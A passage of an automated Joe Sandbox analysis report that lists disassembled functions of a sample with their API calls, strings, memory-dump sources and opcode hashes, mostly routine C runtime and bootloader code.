                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 1717984340-27947307
                                                                                                                      • Opcode ID: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction ID: fe01976edd1574eceb9f11c660a5b0c0080faa7e6646e9a9a67f5b95292af34c
                                                                                                                      • Opcode Fuzzy Hash: 6f52a251bf29f1bf449b33a4b3293576c740d20072ae93535e9e485171440620
                                                                                                                      • Instruction Fuzzy Hash: D401E137B45221B6DA6061697C06F8B3A99CB86F72F154222FF1CE62C0E190E90671A3
                                                                                                                      APIs
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5ADF7
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F5ADFF
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AE88
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F5AEB3
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F5AF08
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                      • Opcode ID: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction ID: 25227c0d234729539fdd7d9042b3328721c1a038aee64d02ba9f913a7ff1b066
                                                                                                                      • Opcode Fuzzy Hash: bc6629a90984b088dfea3498b4301f573e68f9f55ff78c0580e79afcbc2f16e7
                                                                                                                      • Instruction Fuzzy Hash: AC41E330E002089BCF00DF69CC85A9EBBB1AF05325F148255EE185B352D735DA29EB92
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,00000000,?,?), ref: 00F56B35
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00F56B66
                                                                                                                      Strings
                                                                                                                      • Out of memory., xrefs: 00F56B8F
                                                                                                                      • win32_utils_from_utf8, xrefs: 00F56B94
                                                                                                                      • Failed to get wchar_t buffer size., xrefs: 00F56B9B
                                                                                                                      • Failed to decode wchar_t from UTF-8, xrefs: 00F56B88
                                                                                                                      • MultiByteToWideChar, xrefs: 00F56BA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                      • API String ID: 626452242-876015163
                                                                                                                      • Opcode ID: 53cae9a9c7cf728b0d509f7a7bdf7aacd45a71f69e4a6ecb6d1fa079dfe46698
                                                                                                                      • Instruction ID: 991e8fc00a0d3e23406f830713655dbb03e6d62a53b6a6bfcae64e0ee9683035
                                                                                                                      • Opcode Fuzzy Hash: 53cae9a9c7cf728b0d509f7a7bdf7aacd45a71f69e4a6ecb6d1fa079dfe46698
                                                                                                                      • Instruction Fuzzy Hash: 08313E72A443057BD7106E54AC41F1A7BD4EB84722F84063AFF58E72C0E6B5D90CB653
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6A6BD: _free.LIBCMT ref: 00F6A6E2
                                                                                                                      • _free.LIBCMT ref: 00F6A743
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A74E
                                                                                                                      • _free.LIBCMT ref: 00F6A759
                                                                                                                      • _free.LIBCMT ref: 00F6A7AD
                                                                                                                      • _free.LIBCMT ref: 00F6A7B8
                                                                                                                      • _free.LIBCMT ref: 00F6A7C3
                                                                                                                      • _free.LIBCMT ref: 00F6A7CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction ID: 8fc6fa305b51e44683b88a40dd04d519f63c6a23ae65a0e050bc05da06ccaf52
                                                                                                                      • Opcode Fuzzy Hash: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction Fuzzy Hash: D011FE71940B04FAD620BBB0CC47FDB77ECEF46700F444815B29ABA162DB6AB614AB51
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F56A09
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                      • API String ID: 1717984340-876015163
                                                                                                                      • Opcode ID: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
                                                                                                                      • Instruction ID: f6b8689687b20ebc945d1b9d33434f2a923bd80851c786a8e18e79a5d1098dfa
                                                                                                                      • Opcode Fuzzy Hash: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
                                                                                                                      • Instruction Fuzzy Hash: E7012237B8422237D66065657C06D8B7B948B91F73F054232FF2CE21C0E5A0C94A71E3
                                                                                                                      APIs
                                                                                                                      • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
                                                                                                                      • __fassign.LIBCMT ref: 00F6501B
                                                                                                                      • __fassign.LIBCMT ref: 00F65038
                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65080
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F650C0
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65168
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1735259414-0
                                                                                                                      • Opcode ID: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
                                                                                                                      • Instruction ID: ec4ae302011906a40fe076b6a8c749e50aa35ce109be9874808602e1185343b7
                                                                                                                      • Opcode Fuzzy Hash: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
                                                                                                                      • Instruction Fuzzy Hash: 3BC19C75D002589FCF15CFE8C880AEDBBB5AF09314F28416AE855FB242D631AE46DF60
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B23F
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5B24D
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5B266
                                                                                                                      • SetLastError.KERNEL32(00000000,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B2B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 08a37047ff1fd771ca22d188fb9ec271642c244e2bc4993d5d393c4872d5bfb4
                                                                                                                      • Instruction ID: 03de621223e499726134e827d4034e8e59c40bb8064c5b55b12ee0099b1d9d96
                                                                                                                      • Opcode Fuzzy Hash: 08a37047ff1fd771ca22d188fb9ec271642c244e2bc4993d5d393c4872d5bfb4
                                                                                                                      • Instruction Fuzzy Hash: E101B5329192156DE6162AB4BC95A6E3B54EB117B7F300229FF24451E1EF55480DB360
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00000000,00F5218F,00000000,00000000,Failed to obtain/convert traceback!,?,?,?,00000000,00F52EDE,?,?), ref: 00F52013
                                                                                                                      • DialogBoxIndirectParamW.USER32(00000000,?,00000000,00F51D70,?), ref: 00F520CB
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      • DeleteObject.GDI32(?), ref: 00F520FD
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000102), ref: 00F5210F
                                                                                                                      Strings
                                                                                                                      • Unhandled exception in script, xrefs: 00F5203C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam_free
                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                      • API String ID: 4039461714-2699770090
                                                                                                                      • Opcode ID: a942a2babffe53eb3c506c841fe05688f6c63c5a514333ca0b0eed9924e70194
                                                                                                                      • Instruction ID: 8a8f955bf7b9ae801b611a4617f04d003c3cf147d6d57f131e030d0f9d71f4fe
                                                                                                                      • Opcode Fuzzy Hash: a942a2babffe53eb3c506c841fe05688f6c63c5a514333ca0b0eed9924e70194
                                                                                                                      • Instruction Fuzzy Hash: 81311C71508344ABD724AF64CC4DB9FB7E8BF89705F00092ABB8893252D7789509EB53
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F5B464,00000000,00000FA0,00F8EFD4,00000000,?,00F5B58F,00000004,InitializeCriticalSectionEx,00F78F9C,InitializeCriticalSectionEx,00000000), ref: 00F5B433
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                      • Opcode ID: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
                                                                                                                      • Instruction ID: bfb00436f6f58c1fa964ffd32e11ea06ce6c322b2e68ff0c89c4159eed4c28ea
                                                                                                                      • Opcode Fuzzy Hash: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
                                                                                                                      • Instruction Fuzzy Hash: EA11C232E41635ABDB32CF689C49B6D73A4AF01775F250120EE19E7281D770EE05B6D2
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F627FC
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F6280F
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F62832
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
                                                                                                                      • Instruction ID: e653d90eb1f1f895340e8867e863371b1b11f3a331b6608098028bd9cbe03460
                                                                                                                      • Opcode Fuzzy Hash: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
                                                                                                                      • Instruction Fuzzy Hash: 92F01C3194161CFBDB129BA0DD0AB9D7B79EB44766F144161E809A21A0CBB18F40FAD6
                                                                                                                      APIs
                                                                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F5E887), ref: 00F5E977
                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 00F5E9D1
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F5E887,?,000000FF,00000000,00000000), ref: 00F5EA5F
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5EA66
                                                                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F5EAA3
                                                                                                                        • Part of subcall function 00F5ED82: __dosmaperr.LIBCMT ref: 00F5EDB7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1206951868-0
                                                                                                                      • Opcode ID: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
                                                                                                                      • Instruction ID: f01c8a9091c9dd72ccf263a5a549be62fff9529a95c31a63c779c003bd53733b
                                                                                                                      • Opcode Fuzzy Hash: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
                                                                                                                      • Instruction Fuzzy Hash: E3416F75900204ABCB28DFB5DC459AFBBF9FF89311B00451DFA56D3211E7389A48EB10
                                                                                                                      APIs
                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00F51D8E
                                                                                                                      • GetWindowLongW.USER32(?,00000008), ref: 00F51DA4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00F51DC3
                                                                                                                      • SetWindowLongW.USER32(?,00000008,?), ref: 00F51DDE
                                                                                                                      • EndDialog.USER32(?,?), ref: 00F51E17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongWindow$InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1200242243-0
                                                                                                                      • Opcode ID: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
                                                                                                                      • Instruction ID: 72ef2eb52f5dba8eb74be57d405bb46dd8eddc84c8882c28aa4925ad534eed54
                                                                                                                      • Opcode Fuzzy Hash: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
                                                                                                                      • Instruction Fuzzy Hash: 5011E0359042147BE6209B14EC0AFAF77A4FB45322F108C15FE85D62D1C6A5FCC5E6A2
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F6A66C
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A67E
                                                                                                                      • _free.LIBCMT ref: 00F6A690
                                                                                                                      • _free.LIBCMT ref: 00F6A6A2
                                                                                                                      • _free.LIBCMT ref: 00F6A6B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction ID: 8ce288f14cc29528a7c818f92535e100ec2e2837f3179d362b4bb0b382ad8418
                                                                                                                      • Opcode Fuzzy Hash: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction Fuzzy Hash: B4F03032904244AB8660EB68EC86C7A73EDEE407207A94805F018E7521CB75FCC0AFA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F5368D
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D1D
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F536B2
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D46
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533E8
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533F7
                                                                                                                      Strings
                                                                                                                      • SPLASH: Cannot extract requirement %s., xrefs: 00F54CD8
                                                                                                                      • SPLASH: Cannot find requirement %s in archive., xrefs: 00F54D8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncat_strncpy_strrchr
                                                                                                                      • String ID: SPLASH: Cannot extract requirement %s.$SPLASH: Cannot find requirement %s in archive.
                                                                                                                      • API String ID: 4078740465-4094522769
                                                                                                                      • Opcode ID: 5b4eebd5182f27e1bdaa872d5fcffac365495ca491ba9b012dc0650558483d65
                                                                                                                      • Instruction ID: 2511db4ecb3df59b33a62026420ee0334ea4d0a9160cdb3665004b1fa753839f
                                                                                                                      • Opcode Fuzzy Hash: 5b4eebd5182f27e1bdaa872d5fcffac365495ca491ba9b012dc0650558483d65
                                                                                                                      • Instruction Fuzzy Hash: 0851C472404340ABDB21DF54CC85ADF77ECAF85359F000519FE8997202D775A64DEBA2
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Cannot allocate memory for necessary files., xrefs: 00F550E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
